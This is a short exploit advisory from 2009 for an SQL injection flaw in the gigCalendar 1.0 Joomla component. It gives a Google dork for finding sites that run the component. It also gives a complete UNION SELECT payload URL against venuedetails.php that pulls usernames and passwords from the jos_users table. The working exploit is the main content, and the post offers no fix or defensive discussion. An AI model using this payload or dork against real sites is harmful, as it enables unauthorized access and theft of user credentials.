******* Salvatore "drosophila" Fresta ******* Application: gigCalendar Joomla Component 1.0 http://joomlacode.org/gf/project/gigcalendar/ Version: gigCalendar 1.0 Bug: * SQL Injection Exploitation: Remote Dork: inurl:"index.php?option=com_gigcal" Date: 21 Feb 2009 Discovered by:Salvatore "drosophila" Fresta Author: Salvatore "drosophila" Fresta e-mail: drosophilaxxx@xxxxxxxxx ************************************************* - BUGS SQL Injection: Requisites: magic_quotes_gpc = off File affected: venuedetails.php This bug allows a guest to view username and password of a registered user. http://www.site.com/path/index.php?option=com_gigcal&task=details&gigcal_venues_id=-1' UNION ALL SELECT 1,concat('username: ', username),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL FROM jos_users%23 ************************************************* -- Salvatore "drosophila" Fresta CWNP444351